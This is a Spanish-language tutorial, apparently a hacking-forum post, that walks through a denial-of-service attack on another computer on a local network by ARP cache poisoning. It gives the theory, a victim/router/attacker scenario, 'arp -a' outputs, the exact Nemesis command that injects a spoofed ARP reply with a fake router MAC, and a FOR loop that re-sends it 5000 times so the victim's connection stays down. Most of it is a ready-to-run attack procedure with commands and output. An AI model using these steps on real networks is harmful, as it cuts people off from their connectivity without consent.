Practica 1 - Negacin de servicios de Internet a otro equipo de la red local

Teora: El equipo vctima accede a Internet a travs del router. Y a su vez, accede al router pq conoce su direccin IP, q es traducida a direccin MAC a travs del protocolo ARP. Por tanto, en ltima instancia, el equipo vctima accede a Internet mandando paquetes hacia la direccin MAC del router. Si el equipo atacante logra engaar al equipo vctima, haciendole creer q la direccin MAC del router es otra inexistente, el equipo vctima no podr llegar al router, esto es, no podr llegar a Internet. Para llevar esto a cabo, el equipo atacante debe enviar un paquete malicioso suplantando la identidad del router y dicindole al equipo vctima q debe actualizar su tabla ARP con la nueva direccin MAC inexistente.

Aplicacin prctica: Envenenamiento ARP

Escenario: Atacante: 10.10.0.69 Vctima: 10.10.0.254 Router / Puerta de Enlace: 10.10.0.33

Herramientas: Vamos a utilizar el inyector de paquetes Nmesis @ http://www.packetfactory.net/projects/nemesis/ Ms informacin sobre Nemesis en http://foro.elhacker.net/index.php/topic,33197.0.html

Procedimiento: 1 Obtener las direcciones MACs de los equipos vctima y router a travs de sus direcciones IP. Para ello, hacemos un ping a ambos equipos. 2 Obtener la tabla cach ARP de direcciones IP/MAC en el equipo atacante. Esto se hace a travs del comando arp -a Citar C:\>arp -a Interfaz: 10.10.0.69 --- 0x2 Direccin IP Direccin fsica Tipo 10.10.0.33 00-c0-49-44-b1-d5 dinmico 10.10.0.254 00-20-18-b0-06-df dinmico C:\> 3 Obtener la tabla cach ARP de direcciones IP/MAC en el equipo vctima. Esto es lo q

supuestamente ocurrira en el equipo vctima... Citar C:\WINDOWS\system32>arp -a Interfaz: 10.10.0.254 --- 0x2 Direccin IP Direccin fsica Tipo 10.10.0.33 00-c0-49-44-b1-d5 dinmico 10.10.0.69 00-05-1c-0a-ab-92 dinmico C:\WINDOWS\system32> 4 Verificar que la vctima tiene conexin a Internet. Esto es lo q supuestamente ocurrira en el equipo vctima... Citar C:\WINDOWS\system32>ping www.google.es -t Haciendo ping a www.google.akadns.net [66.102.11.99] con 32 bytes de datos: Respuesta desde 66.102.11.99: bytes=32 tiempo=93ms TTL=241 Respuesta desde 66.102.11.99: bytes=32 tiempo=113ms TTL=237 Respuesta desde 66.102.11.99: bytes=32 tiempo=110ms TTL=237 etc. 5 Inyectar desde el atacante el paquete malicioso que envenena la tabla cach ARP de la vctima con la MAC errnea del router. Sintaxis de la inyeccin: nemesis arp -D IPvictima -S IProuter -H MACrouter Citar C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF ARP Packet Injected C:\> 6 Obtener la tabla cach ARP de direcciones IP/MAC envenenada en el equipo vctima. Esto es lo q supuestamente ocurrira en el equipo vctima... Citar C:\WINDOWS\system32>arp -a Interfaz: 10.10.0.254 --- 0x2 Direccin IP Direccin fsica Tipo 10.10.0.33 aa-bb-cc-dd-ee-ff dinmico 10.10.0.69 00-05-1c-0a-ab-92 dinmico C:\WINDOWS\system32> 7 Verificar que la vctima NO tiene conexin a Internet. Esto es lo q supuestamente ocurrira en el equipo vctima...

Citar C:\WINDOWS\system32>ping www.google.es -t Haciendo ping a www.google.akadns.net [66.102.11.99] con 32 bytes de datos: Tiempo de espera agotado para esta solicitud. Tiempo de espera agotado para esta solicitud. Tiempo de espera agotado para esta solicitud. Tiempo de espera agotado para esta solicitud. Tiempo de espera agotado para esta solicitud. Tiempo de espera agotado para esta solicitud. Tiempo de espera agotado para esta solicitud. Respuesta desde 66.102.11.99: bytes=32 tiempo=112ms TTL=238 etc. Como podis observar, despus de cierto tiempo, el sistema Windows de la vctima refrescar su tabla cach ARP con la verdadera direccin MAC del router y, entonces, s que dispondr de conexin Internet. Se fastidi el invento?? Noooo... si estamos continua y peridicamente envenenando la tabla cach ARP de la vctima desde el equipo atacante. Para ello, inyectamos el paquete con Nemesis desde un bucle FOR: Citar C:\>FOR /L %i IN (1,1,5000) DO nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF ARP Packet Injected C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF ARP Packet Injected C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF ARP Packet Injected C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF ARP Packet Injected C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF ARP Packet Injected etc. De esta forma, la vctima no dispondr de conexin a Internet mientras dure el bucle FOR del atacante...